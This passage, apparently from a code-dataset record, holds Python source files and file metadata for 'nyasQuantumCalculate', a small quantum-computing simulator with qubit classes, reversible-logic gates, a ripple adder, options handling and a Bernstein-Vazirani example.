False\n\n\n###############################################################################\n###############################################################################\n\n\nclass _MEASURE(BitsOperation):\n def __init__(self) -> None:\n super().__init__()\n self.name = \"MEASURE\"\n self.trackable = True\n\n def call(self, b: Bit) -> bool:\n return b.system.states[b.index]\n\n def __call__(self, b: Bit) -> bool:\n bsys = b.system\n sysStopTrack = bsys.stopTracking\n if bsys.canTrack() and self.trackable:\n bsys.addTrack(self.name, b.index)\n bsys.stopTracking = True\n result = self.call(b)\n if not sysStopTrack:\n bsys.stopTracking = False\n return result\n\n\nclass _MEASUREALL(BitsOperation):\n def __init__(self) -> None:\n super().__init__()\n self.name = \"MEASUREALL\"\n self.trackable = True\n\n def call(self, bs: Bits) -> List[bool]:\n states = bs.system.states\n return [states[index] for index in bs.indexes]\n\n def 
__call__(self, bs: Bits) -> List[bool]:\n bsys = bs.system\n sysStopTrack = bsys.stopTracking\n if bsys.canTrack() and self.trackable:\n bsys.addTrack(self.name, *bs.indexes)\n bsys.stopTracking = True\n result = self.call(bs)\n if not sysStopTrack:\n bsys.stopTracking = False\n return result\n\n\n###############################################################################\n###############################################################################\n\n\nM = _MEASURE()\nMA = _MEASUREALL()\n\nR = _RESET()\nRA = _RESETALL()\n\nCNOT = _CNOT()\nCCNOT = _CCNOT()\nToffoli = CCNOT\n\nSWAP = _SWAP()\n" }, { "alpha_fraction": 0.5486706495285034, "alphanum_fraction": 0.5532850027084351, "avg_line_length": 28.361289978027344, "blob_id": "aba2a21c0dec380cfda3eba35c7c29e9448ddec1", "content_id": "fd3a3ff44a6dcdf4bb5d1e264bad75ca08b2b4a8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4847, "license_type": "no_license", "max_line_length": 79, "num_lines": 155, "path": "/nyasQuantumCalculate/System/Qubits.py", "repo_name": "wxdlywy/nyasQuantumCalculate", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n\nfrom typing import Union, Any\n\nfrom .QubitsSystem import *\nfrom .Qubit import *\n\n\n__all__ = [\"Qubits\", \"TemporaryQubits\"]\n\n\nclass Qubits:\n \"\"\"Qubits(QubitsSystem, *int)\n\n 多个量子位对象, 可以通过 `qbsys.getQubits(*idx)` 或 `qbsys[from:to]` 得到.\n\n 因为在Qubits里面会对QubitsSystem引用一次, 所以在释放QubitsSystems前\n 请确保所有相应的Qubits也被释放.\n\n Attributes:\n system: 量子位所在的系统\n indexes: 量子位索引\n \"\"\"\n\n def __init__(self, qbsys: QubitsSystem, *idxs: int) -> None:\n if not all(0 <= index < qbsys.nQubits for index in idxs):\n raise ValueError(\"Out of range index(es) in input parameters.\")\n self.system = qbsys\n self.indexes = list(idxs)\n self._ptr = 0\n\n def haveSameQubit(self) -> bool:\n return len(self.indexes) != len(set(self.indexes))\n\n def __str__(self) -> str:\n return f\"Qubits({len(self)} qubits)\"\n\n def __repr__(self) -> str:\n return \"Qubits([{}] in system with id:{})\".format(\n # 虽然可以写为 `','.join(self.indexes)`\n # 但是类型提示会出现, 所以就写多一步了\n ','.join(str(i) for i in self.indexes),\n self.system.id\n )\n\n def __len__(self) -> int: return len(self.indexes)\n\n def __getitem__(self, idxx: Union[slice, int]) -> Any:\n if isinstance(idxx, slice):\n return Qubits(self.system, *self.indexes[idxx])\n return Qubit(self.system, self.indexes[idxx])\n\n def __iter__(self) -> \"Qubits\":\n self._ptr = 0\n return self\n\n def __next__(self) -> Qubit:\n if self._ptr < len(self.indexes):\n self._ptr += 1\n return Qubit(self.system, self.indexes[self._ptr - 1])\n raise StopIteration\n\n def __iadd__(self, other: Union[Qubit, \"Qubits\"]) -> \"Qubits\":\n assert self.system.id == other.system.id\n if isinstance(other, Qubit):\n self.indexes.append(other.index)\n else:\n self.indexes += other.indexes\n return self\n\n def __add__(self, other: Union[Qubit, \"Qubits\"]) -> \"Qubits\":\n result = Qubits(self.system)\n result.indexes = self.indexes.copy()\n result += other\n return result\n\n\nclass TemporaryQubits:\n \"\"\"TemporaryQubits(QubitsSystem, int)\n\n 配合with语句产生临时的Qubits对象, 临时Qubits的内存块在with退出时会被销毁. 在\n 使用完临时Qubits后记得释放临时Qubits对象, 否则可能会引起不必要的错误.\n\n To use:\n >>> qbsys = QubitsSystem(4)\n >>> qbsys.nQubits\n 4\n >>> with TemporaryQubits(qbsys, 3) as tmpQbs:\n ... 
print(qbsys.nQubits, tmpQbs)\n ...\n 7 Qubits(3 qubits)\n >>> qbsys.nQubits\n 4\n >>> del tmpQbs # 释放临时Qubits对象\n \"\"\"\n def __init__(self, qbsys: QubitsSystem, nQubits: int):\n self.system = qbsys\n self.nQubits = nQubits\n\n def __enter__(self) -> Qubits:\n self.system.addQubits(self.nQubits)\n return Qubits(self.system, *range(self.system.nQubits - self.nQubits,\n self.system.nQubits))\n\n def __exit__(self, *error: Any) -> None:\n self.system.popQubits(self.nQubits)\n\n\n###############################################################################\n########################## * 你不应该调用以下方法 ##############################\n###############################################################################\n\n\ndef Qubit___add__(self: Qubit, other: Union[Qubit, Qubits]) -> Qubits:\n if isinstance(other, Qubits):\n return Qubits(self.system, self.index, *other.indexes)\n return Qubits(self.system, self.index, other.index)\n\n\ndef Qubit_asQubits(self: Qubit) -> Qubits:\n return Qubits(self.system, self.index)\n\n\ndef QubitsSystem_getQubits(self: QubitsSystem, *idxs: int) -> Qubits:\n if len(idxs) == 0:\n return Qubits(self, *range(self.nQubits))\n return Qubits(self, *idxs)\n\n\ndef QubitsSystem___getitem__(self: QubitsSystem,\n idx: Union[int, slice]) -> Any:\n if isinstance(idx, slice):\n step: int = idx.step or 1\n if step > 0:\n start = idx.start or 0\n stop = idx.stop or self.nQubits\n else:\n start = idx.start or self.nQubits - 1\n stop = idx.stop or -1\n if start < 0:\n start += self.nQubits\n if stop < 0:\n stop += self.nQubits\n return Qubits(self, *range(start, stop, step))\n else:\n if idx < 0:\n idx += self.nQubits\n return Qubit(self, idx)\n\n\nQubit.__add__ = Qubit___add__\nQubit.asQubits = Qubit_asQubits\n\nQubitsSystem.getQubits = QubitsSystem_getQubits\nQubitsSystem.__getitem__ = QubitsSystem___getitem__\n" }, { "alpha_fraction": 0.4503366947174072, "alphanum_fraction": 0.48569023609161377, "avg_line_length": 29.461538314819336, "blob_id": "612cb356c0cbb581be6b266b9f35f38b35184bb4", "content_id": "172262b6e0ab30ff73ebd2d4d79039ec53e95c12", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1188, "license_type": "no_license", "max_line_length": 64, "num_lines": 39, "path": "/nyasQuantumCalculate/RevCal/HighLevel.py", "repo_name": "wxdlywy/nyasQuantumCalculate", "src_encoding": "UTF-8", "text": "from nyasQuantumCalculate.Options import *\nfrom .System import *\nfrom .Operate import *\n\n\n__all__ = [\"Adder\"]\n\n\ndef Adder(Cin: Bit, A: Bits, B: Bits, Cout: Bit) -> None:\n if not inSameSystem(Cin, A, B, Cout):\n raise ValueError(\"Input qubits are not in same system.\")\n if len(A) != len(B):\n raise ValueError(\"Length of A and B should be same.\")\n n = len(A)\n A_ = A if Options.littleEndian else A[::-1]\n B_ = B if Options.littleEndian else B[::-1]\n with TemporaryBits(Cin.system, n - 1) as tmp:\n carries = Cin + tmp + Cout\n for index in range(n):\n q0 = carries[index]\n q1 = A_[index]\n q2 = B_[index]\n q3 = carries[index + 1]\n CCNOT(q1, q2, q3)\n CNOT(q1, q2)\n CCNOT(q0, q2, q3)\n CNOT(A_[-1], B_[-1])\n CNOT(carries[-2], B_[-1])\n CNOT(A_[-1], B_[-1])\n for index in range(n-2, -1, -1):\n q0 = carries[index]\n q1 = A_[index]\n q2 = B_[index]\n q3 = carries[index + 1]\n CCNOT(q0, q2, q3)\n CNOT(q1, q2)\n CCNOT(q1, q2, q3)\n CNOT(q0, q2)\n CNOT(q1, q2)\n" }, { "alpha_fraction": 0.512204647064209, "alphanum_fraction": 0.5159698724746704, "avg_line_length": 29.563491821289062, "blob_id": 
"478a76c34e6a2fed27bd190f93329175e748781d", "content_id": "bd142ab590d7e5cdf8b76f8e6faa299ec40c9102", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 7736, "license_type": "no_license", "max_line_length": 79, "num_lines": 252, "path": "/nyasQuantumCalculate/RevCal/System.py", "repo_name": "wxdlywy/nyasQuantumCalculate", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n\nfrom typing import Any, List, Tuple, Union\n\nfrom nyasQuantumCalculate.Options import *\n\n\n__all__ = [\"BitsSystem\", \"Bit\", \"Bits\", \"TemporaryBit\", \"TemporaryBits\",\n \"inSameSystem\"]\n\n\nclass id_manager:\n _last_id = -1\n\n @classmethod\n def getID(cls) -> int:\n cls._last_id += 1\n return cls._last_id\n\n\nclass BitsSystem:\n def __init__(self, nBits: int) -> None:\n self.states = [False] * nBits\n self._id = id_manager.getID()\n self.ctlBits: List[int] = list()\n self._ctlBitPkgs: List[List[int]] = list()\n self._tracker: List[Tuple[Tuple[int, ...],\n Tuple[int, ...], str]] = list()\n self.stopTracking = False\n\n def __del__(self) -> None:\n if Options.checkCleaningSystem and any(self.states):\n raise RuntimeError(\"Before cleaning up bits system, \"\n \"system should be reset.\")\n\n @property\n def nBits(self) -> int: return len(self.states)\n\n @property\n def id(self) -> int: return self._id\n\n def getBit(self, idx: int) -> Any:\n raise NotImplementedError\n\n def getBits(self, *idxs: int) -> Any:\n raise NotImplementedError\n\n def __getitem__(self, idx: Union[int, slice]) -> Any:\n raise NotImplementedError\n\n def restart(self) -> None:\n for index in range(self.nBits):\n self.states[index] = False\n\n ########################## Related to tracking ##########################\n\n def canTrack(self) -> bool:\n return Options.allowTracking and not self.stopTracking\n\n def addTrack(self, name: str, *idxs: int) -> None:\n self._tracker.append((tuple(self.ctlBits), tuple(idxs), name))\n\n #################### Related to controlling bits ########################\n\n def addControllingBits(self, *idxs: int) -> None:\n if not idxs:\n return\n if any(idx in self.ctlBits for idx in idxs):\n raise ValueError(\"Controlling bit are added repeatedly.\")\n self._ctlBitPkgs.append(list(idxs))\n self.updateControllingBits()\n\n def popControllingBits(self) -> None:\n if not self._ctlBitPkgs:\n return\n self._ctlBitPkgs.pop()\n self.updateControllingBits()\n\n def updateControllingBits(self) -> None:\n self.ctlBits.clear()\n if not self._ctlBitPkgs:\n return\n for pkg in self._ctlBitPkgs:\n self.ctlBits += pkg\n\n ##################### Related to temporary bit ##########################\n\n def addBits(self, nBits: int) -> None:\n if nBits <= 0:\n raise ValueError(f\"Cannot add {nBits} bits.\")\n self.states += [False] * nBits\n\n def popBits(self, nBits: int) -> None:\n if nBits <= 0:\n raise ValueError(f\"Cannot add {nBits} bits.\")\n if any(idx >= self.nBits - nBits for idx in self.ctlBits):\n raise ValueError(\"The qubit removed is controlling bit.\")\n self.states = self.states[:-nBits]\n\n\n###############################################################################\n###############################################################################\n\n\nclass Bit:\n def __init__(self, bsys: BitsSystem, idx: int) -> None:\n if not 0 <= idx < bsys.nBits:\n raise ValueError(f\"The qubit indexed {idx} does not exist.\")\n self.system = bsys\n self.index = idx\n\n def __add__(self, other: Union[\"Bit\", \"Bits\"]) -> Any:\n raise 
NotImplementedError\n\n def asBits(self) -> Any:\n raise NotImplementedError\n\n\nclass TemporaryBit:\n def __init__(self, bsys: BitsSystem):\n self.system = bsys\n\n def __enter__(self) -> Bit:\n self.system.addBits(1)\n return Bit(self.system, self.system.nBits - 1)\n\n def __exit__(self, *error: Any) -> None:\n self.system.popBits(1)\n\n\n###############################################################################\n###############################################################################\n\n\nclass Bits:\n def __init__(self, bsys: BitsSystem, *idxs: int) -> None:\n if not all(0 <= index < bsys.nBits for index in idxs):\n raise ValueError(\"Input parameters are out of range.\")\n self.system = bsys\n self.indexes = list(idxs)\n self._ptr = 0\n\n def __len__(self) -> int: return len(self.indexes)\n\n def __getitem__(self, idxx: Union[slice, int]) -> Any:\n if isinstance(idxx, slice):\n return Bits(self.system, *self.indexes[idxx])\n return Bit(self.system, self.indexes[idxx])\n\n def __iter__(self) -> \"Bits\":\n self._ptr = 0\n return self\n\n def __next__(self) -> Bit:\n if self._ptr < len(self.indexes):\n self._ptr += 1\n return Bit(self.system, self.indexes[self._ptr - 1])\n raise StopIteration\n\n def __iadd__(self, other: Union[Bit, \"Bits\"]) -> \"Bits\":\n assert self.system.id == other.system.id\n if isinstance(other, Bit):\n self.indexes.append(other.index)\n else:\n self.indexes += other.indexes\n return self\n\n def __add__(self, other: Union[Bit, \"Bits\"]) -> \"Bits\":\n result = Bits(self.system)\n result.indexes = self.indexes.copy()\n result += other\n return result\n\n\nclass TemporaryBits:\n def __init__(self, bsys: BitsSystem, nBits: int):\n self.system = bsys\n self.nBits = nBits\n\n def __enter__(self) -> Bits:\n self.system.addBits(self.nBits)\n return Bits(self.system, *range(self.system.nBits - self.nBits,\n self.system.nBits))\n\n def __exit__(self, *error: Any) -> None:\n self.system.popBits(self.nBits)\n\n\n###############################################################################\n###############################################################################\n\n\ndef BitsSystem_getBit(self: BitsSystem, idx: int) -> Bit:\n return Bit(self, idx)\n\n\ndef Bit___add__(self: Bit, other: Union[Bit, Bits]) -> Bits:\n if isinstance(other, Bits):\n return Bits(self.system, self.index, *other.indexes)\n return Bits(self.system, self.index, other.index)\n\n\ndef Bit_asBits(self: Bit) -> Bits:\n return Bits(self.system, self.index)\n\n\ndef BitsSystem_getBits(self: BitsSystem, *idxs: int) -> Bits:\n if len(idxs) == 0:\n return Bits(self, *range(self.nBits))\n return Bits(self, *idxs)\n\n\ndef BitsSystem___getitem__(self: BitsSystem,\n idx: Union[int, slice]) -> Any:\n if isinstance(idx, slice):\n step: int = idx.step or 1\n if step > 0:\n start = idx.start or 0\n stop = idx.stop or self.nBits\n else:\n start = idx.start or self.nBits - 1\n stop = idx.stop or -1\n if start < 0:\n start += self.nBits\n if stop < 0:\n stop += self.nBits\n return Bits(self, *range(start, stop, step))\n else:\n if idx < 0:\n idx += self.nBits\n return Bit(self, idx)\n\n\nBit.__add__ = Bit___add__\nBit.asBits = Bit_asBits\n\nBitsSystem.getBit = BitsSystem_getBit\nBitsSystem.getBits = BitsSystem_getBits\nBitsSystem.__getitem__ = BitsSystem___getitem__\n\n###############################################################################\n###############################################################################\n\n\ndef inSameSystem(*args: Union[Bit, Bits, BitsSystem]) -> bool:\n 
\"\"\"检查输入是否处于同一个量子位系统内\"\"\"\n ele0 = args[0]\n id = (ele0 if isinstance(ele0, BitsSystem) else ele0.system).id\n for ele in args[1:]:\n if (ele if isinstance(ele, BitsSystem) else ele.system).id != id:\n return False\n return True\n" }, { "alpha_fraction": 0.5961138010025024, "alphanum_fraction": 0.6138098835945129, "avg_line_length": 25.200000762939453, "blob_id": "881a86efa06f2598b20fb1ad9efae6f8fe73ccab", "content_id": "92c6cf3ca8a3a48d012c7c4ed06b5c99839d802c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3176, "license_type": "no_license", "max_line_length": 62, "num_lines": 110, "path": "/nyasQuantumCalculate/Options.py", "repo_name": "wxdlywy/nyasQuantumCalculate", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n\n\"\"\"用于控制库的一些默认行为\n\nsee more: `help(Options)` or `help(TemporaryOptions)`\n\"\"\"\n\nfrom typing import Any\n\n\n__all__ = [\"Options\", \"TemporaryOptions\", \"TempOption\"]\n\n\nclass _options:\n \"\"\"不应该由用户实例化这个对象\n\n Attributes:\n autoNormalize: 自动在作用位门后归一化系统 [default: True]\n allowTracking: 跟踪量子位系统的每一个操作 [default: False]\n littleEndian: 小端模式 [default: False]\n QFTwithNumpy: 使用numpy而不是位门实现QFT [default: True]\n checkCleaningSystem: 清除系统时检查系统是否已被重置 [default: True]\n QFTswap: 默认QFT在末端有SWAP操作, 但有些操作不需要SWAP [default: True]\n inputCheck: 对位门输入进行检查, 避免造成错误的逻辑结果 [default: True]\n\n To use: (littleEndian)\n >>> qbsys = QubitsSystem(2)\n >>> H(qbsys[0])\n >>> qbsys.states\n array([[0.70710678+0.j],\n [0. +0.j],\n [0.70710678+0.j],\n [0. +0.j]])\n >>> Options.reverseBitIndex = True\n array([[0.70710678+0.j],\n [0.70710678+0.j],\n [0. +0.j],\n [0. +0.j]])\n \"\"\"\n def __init__(self) -> None:\n self.autoNormalize = True\n self.allowTracking = False\n self.littleEndian = False\n self.QFTwithNumpy = True\n self.checkCleaningSystem = True\n self.QFTswap = True\n self.inputCheck = True\n\n\nOptions = _options()\n\n\nclass TempOption:\n \"\"\"see more: help(TemporaryOptions)\"\"\"\n def __init__(self, option: str, after: bool) -> None:\n Options.__getattribute__(option)\n self.option = option\n self._after = after\n self._before = False\n\n def __enter__(self) -> None:\n self._before = Options.__getattribute__(self.option)\n Options.__setattr__(self.option, self._after)\n\n def __exit__(self, *error: Any) -> None:\n Options.__setattr__(self.option, self._before)\n\n\nclass TemporaryOptions:\n \"\"\"不应该由用户实例化这个对象\n\n 配合with语句在代码块中临时把设置改为特定值\n\n To use:\n >>> Options.autoNormalize\n True\n >>> with TemporaryOptions.autoNormalize(False):\n ... 
print(Options.autoNormalize)\n    ...\n    False\n    >>> Options.autoNormalize\n    True\n    \"\"\"\n    @staticmethod\n    def autoNormalize(after: bool) -> TempOption:\n        return TempOption(\"autoNormalize\", after)\n\n    @staticmethod\n    def allowTracking(after: bool) -> TempOption:\n        return TempOption(\"allowTracking\", after)\n\n    @staticmethod\n    def littleEndian(after: bool) -> TempOption:\n        return TempOption(\"littleEndian\", after)\n\n    @staticmethod\n    def QFTwithNumpy(after: bool) -> TempOption:\n        return TempOption(\"QFTwithNumpy\", after)\n\n    @staticmethod\n    def checkCleaningSystem(after: bool) -> TempOption:\n        return TempOption(\"checkCleaningSystem\", after)\n\n    @staticmethod\n    def QFTswap(after: bool) -> TempOption:\n        return TempOption(\"QFTswap\", after)\n\n    @staticmethod\n    def inputCheck(after: bool) -> TempOption:\n        return TempOption(\"inputCheck\", after)\n" }, { "alpha_fraction": 0.6598465442657471, "alphanum_fraction": 0.6675191521644592, "avg_line_length": 29.076923370361328, "blob_id": "82f6f5e2b2504159dfbb17dc4502d39f6f8e5c53", "content_id": "6650805e58c61ea6746233d402569c1f15ff499e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 391, "license_type": "no_license", "max_line_length": 65, "num_lines": 13, "path": "/setup.py", "repo_name": "wxdlywy/nyasQuantumCalculate", "src_encoding": "UTF-8", "text": "from setuptools import setup, find_packages\n\nsetup(\n    name = \"nyasQuantumCalculate\",\n    version = \"0.1.2\",\n    author = \"nyasyamorina\",\n    author_email = \"[email protected]\",\n    description = \"A Simple Quantum Calculation Simulate Packge\",\n    url = \"https://github.com/nyasyamorina/nyasQuantumCalculate\",\n    packages = find_packages(),\n    install_requires = [\"numpy\"],\n    zip_safe = False,\n)\n" }, { "alpha_fraction": 0.5105041861534119, "alphanum_fraction": 0.5241596698760986, "avg_line_length": 22.15517234802246, "blob_id": "536045c0676d42bf1f637b4c4cf4bfe6bbdd444f", "content_id": "a03084afccac8993d5841addd5486b71416869a6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2267, "license_type": "no_license", "max_line_length": 91, "num_lines": 81, "path": "/examples/3-BernsteinVaziraniAlgorithm.py", "repo_name": "wxdlywy/nyasQuantumCalculate", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\nimport sys\nimport os\nsys.path.append(os.path.dirname(os.path.dirname(__file__)))\n\nfrom typing import List\n\nimport numpy as np\n\nfrom nyasQuantumCalculate import *\nfrom nyasQuantumCalculate.Utils import Int2Bools\n\n\n################################ Problem #####################################\n\"\"\"\nThere is a parametrized black box f_s(x) = s·x, where s and x are n-bit\nintegers and s·x is the inner product of s and x over {0,1}^n, i.e.\ns·x = s1*x1⊕s2*x2⊕...⊕sn*xn, with ⊕ meaning XOR.\n\nRecover s by querying the black box.\n\"\"\"\n\nn = 4  # length of the bit string\n\n\n########################## Initialize the black box ##########################\n# The target bit string\ns = Int2Bools(int(2 ** n * np.random.random()), n)  # pick a random bit string\nprint(f\"bit string: [{''.join(map(lambda b: '1' if b else '0', s))}]\")\n\ndef UnknownClassical(x: int) -> bool:\n    \"\"\"Interface offered to the classical algorithm\"\"\"\n    res = False\n    for ele in s:\n        # x & 1 == 1 extracts the lowest bit of x as a bool\n        res ^= ele and (x & 1 == 1)\n        x >>= 1\n    return res\n\ndef UnknownQuantum(qbs: Qubits):\n    \"\"\"Interface offered to the quantum algorithm\"\"\"\n    ApplyFromBools(Builtin.Z, s, qbs)\n\n\n############################ Classical algorithm ##############################\n\"\"\"The classical algorithm needs n calls to the black box to recover s,\nextracting one bit of s per call\"\"\"\n\ndef mainClassical():\n    x = 1\n    result: List[bool] = list()\n    for _ in range(n):\n        result.append(UnknownClassical(x))\n        x <<= 1\n
<<= 1\n # 输出\n print(f\"bit string (Classical): [{''.join(map(lambda b: '1' if b else '0', result))}]\")\n\nmainClassical()\n\n\n################################# 量子算法 ###################################\n\"\"\"量子算法只需要调用1次黑盒就可以得到s\n原理与频谱分析有关, 见阿达马变换 https://en.wikipedia.org/wiki/Hadamard_transform\"\"\"\n\ndef mainQuantum():\n # 初始化量子位系统\n qbsys = QubitsSystem(n)\n qbs = qbsys.getQubits()\n\n # BernsteinVazirani算法\n ApplyToEach(Builtin.H, qbs)\n UnknownQuantum(qbs)\n ApplyToEach(Builtin.H, qbs)\n\n # 测量并重设所有量子位\n result = Builtin.MA(qbs)\n Builtin.RA(qbs)\n\n # 输出\n print(f\"bit string (Quantum): [{''.join(map(lambda b: '1' if b else '0', result))}]\")\n\nmainQuantum()\n" }, { "alpha_fraction": 0.5018116235733032, "alphanum_fraction": 0.5289855003356934, "avg_line_length": 27.675325393676758, "blob_id": "55563b1c3f68ebca6b54949cf2a093086abd3ac9", "content_id": "48bb7a73974498572ea0219405b6d71812a05c97", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2350, "license_type": "no_license", "max_line_length": 80, "num_lines": 77, "path": "/nyasQuantumCalculate/Operate/SWAP.py", "repo_name": "wxdlywy/nyasQuantumCalculate", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n\nfrom .ControlMethod import *\nfrom .SingleQubitGate import *\nfrom .QubitsOperation import *\nfrom nyasQuantumCalculate.Options import *\nfrom nyasQuantumCalculate.System import *\n\n\n__all__ = [\"SWAP\"]\n\n\nclass _SWAP(QubitsOperation):\n \"\"\"交换量子位数据\n\n 量子数据可以移动但不可复制, 这里是直接交换两个量子位的数据. 两个\n 量子位必须处于相同的量子位系统.\n\n To use:\n >>> qbsys = QubitsSystem(2)\n >>> q0, q1 = qbsys.getQubits()\n >>> X(q0)\n >>> qbsys.states\n array([[0.+0.j],\n [1.+0.j],\n [0.+0.j],\n [0.+0.j]])\n >>> SWAP(q0, q1)\n >>> qbsys.states\n array([[0.+0.j],\n [0.+0.j],\n [1.+0.j],\n [0.+0.j]])\n \"\"\"\n def __init__(self) -> None:\n super().__init__()\n self.name = \"SWAP\"\n self.trackable = True\n self.controllable = True\n\n def call(self, q0: Qubit, q1: Qubit) -> None:\n qbsys = q0.system\n if qbsys.nControllingQubits == 0:\n qbsys.statesNd = qbsys.statesNd.swapaxes(\n qbsys.statesNdIndex(q0.index),\n qbsys.statesNdIndex(q1.index)\n )\n else:\n # 事实上, 受控SWAP应该为\n # CNOT(q1, q0); Controlled(CNOT, ctlQbs, q0, q1); CNOT(q1, q0)\n # 而这里是\n # Controlled(CNOT, ctlQbs, q1, q0)\n # Controlled(CNOT, ctlQbs, q0, q1)\n # Controlled(CNOT, ctlQbs, q1, q0)\n # 结果上相同就好\n CNOT(q1, q0)\n CNOT(q0, q1)\n CNOT(q1, q0)\n\n def __call__(self, q0: Qubit, q1: Qubit) -> None:\n if Options.inputCheck:\n if not inSameSystem(q0, q1):\n raise ValueError(\"Two qubits are in different qubit system.\")\n if any(isControllingQubits(q0, q1)):\n raise ValueError(\"Controlled process operates controlling bit.\")\n if haveSameQubit(q0, q1):\n raise ValueError(\"Cannot swap the same qubit.\")\n qbsys = q0.system\n sysStopTrack = qbsys.stopTracking\n if qbsys.canTrack() and self.trackable:\n qbsys.addTrack(self.name, q0.index, q1.index)\n qbsys.stopTracking = True\n self.call(q0, q1)\n if not sysStopTrack:\n qbsys.stopTracking = False\n\n\nSWAP = _SWAP()\n" }, { "alpha_fraction": 0.4510028660297394, "alphanum_fraction": 0.49398282170295715, "avg_line_length": 25.439393997192383, "blob_id": "51ca02bb21789212dd646b5cd7eabf23f35b599a", "content_id": "1257f8966eb965761f111dcdf032e6f48d56345e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1745, "license_type": "no_license", "max_line_length": 79, "num_lines": 66, "path": "/randerColorWheel.py", "repo_name": 
"wxdlywy/nyasQuantumCalculate", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n\nimport numpy as np\n\nfrom nyasQuantumCalculate.Utils import ColorWheel2RGB\n\n\nfigSize = 500\nbgColor = \"#262626\"\n\nwheelRange = (0.4, 0.9)\nfadeWidth = 0.05\n\n##############################################################################\n\nbgc = np.array((int(bgColor[1:3], 16),\n int(bgColor[3:5], 16),\n int(bgColor[5:], 16)), np.uint8)\n\nfig = np.ones((figSize, figSize, 3), np.uint8) * bgc\n\nrsize_2 = 2 / figSize\nRRin = wheelRange[0] * wheelRange[0]\nRRout = wheelRange[1] * wheelRange[1]\nk = 1 / fadeWidth\nb0 = wheelRange[0] * k\nb1 = wheelRange[1] * k\n\ntotalRun = figSize * figSize\ncountRun = 0\n\nfor yf in range(figSize):\n y = yf * rsize_2 - 1\n for xf in range(figSize):\n x = xf * rsize_2 - 1\n rr = x * x + y * y\n if RRin <= rr <= RRout:\n r = np.sqrt(rr)\n color = np.array(ColorWheel2RGB(np.angle(x - 1j * y)), np.uint8)\n alpha = np.clip(min(k * r - b0, -k * r + b1), 0., 1.)\n color = color * alpha + bgc * (1. - alpha)\n color = np.clip(color, 0., 255.)\n fig[yf, xf] = color\n countRun += 1\n prop = countRun / totalRun\n barL = int(50 * prop - 1)\n print(f\"[{100 * prop:.1f}%%] \"\n f\"[{'=' * max(barL, 0)}>{' ' * max(49 - barL, 0)}]\", end='\\r')\nprint()\n\n###############################################################################\n\nfile_name = \"ColorWheel.png\"\n\ntry:\n import cv2\nexcept ModuleNotFoundError:\n try:\n from PIL import Image\n except ModuleNotFoundError:\n from matplotlib import pyplot as plt\n plt.imsave(file_name, fig)\n else:\n Image.fromarray(fig).save(file_name)\nelse:\n cv2.imwrite(file_name, fig[..., ::-1])\n" }, { "alpha_fraction": 0.5851181149482727, "alphanum_fraction": 0.5965996980667114, "avg_line_length": 27.306249618530273, "blob_id": "e1422ca16fd9210928c85a4b6ea2f5d0dda14f46", "content_id": "828f5a3e3f8cffdbf3af09935744946faf28d0bb", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5033, "license_type": "no_license", "max_line_length": 80, "num_lines": 160, "path": "/nyasQuantumCalculate/Operate/ControlMethod.py", "repo_name": "wxdlywy/nyasQuantumCalculate", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n\nfrom nyasQuantumCalculate.Options import Options\nfrom typing import Any, Callable, Iterable, Union\n\nfrom .QubitsOperation import *\nfrom .SingleQubitGate import *\nfrom nyasQuantumCalculate.Utils import *\nfrom nyasQuantumCalculate.System import *\n\n\n__all__ = [\"Controlled\", \"ControlledOnInt\", \"Toffoli\", \"CNOT\", \"CCNOT\"]\n\n\ndef Controlled(opr: Union[OperationLike, Callable[[Any], Any]], ctlQbs: Qubits,\n *args: Any, **kwargs: Any) -> Any:\n \"\"\"控制过程\n\n 把普通可控的量子位过程转为控制过程, 暂时只有单量子位门属于可控过程.\n\n Args:\n opr: 可控的量子位过程\n ctlQbs: 控制位\n *args, **kwargs: 输入到过程的参数\n\n Returns:\n opr返回的值\"\"\"\n operation = QubitsOperation.getOperation(opr)\n if isinstance(operation, QubitsOperation) and not operation.controllable:\n raise ValueError(\"Target process is uncontrollable.\")\n ctlQbs.system.addControllingQubits(*ctlQbs.indexes)\n result = operation(*args, **kwargs)\n ctlQbs.system.popControllingQubits()\n return result\n\n\ndef ControlledOnBools(opr: OperationLike, bools: Iterable[bool], ctlQbs: Qubits,\n *args: Any, **kwargs: Any) -> Any:\n \"\"\"整数控制过程\n\n 类似`Controlled`, 但只有控制位符合bools(而不是全部为1)时, 触发\n 过程opr. 
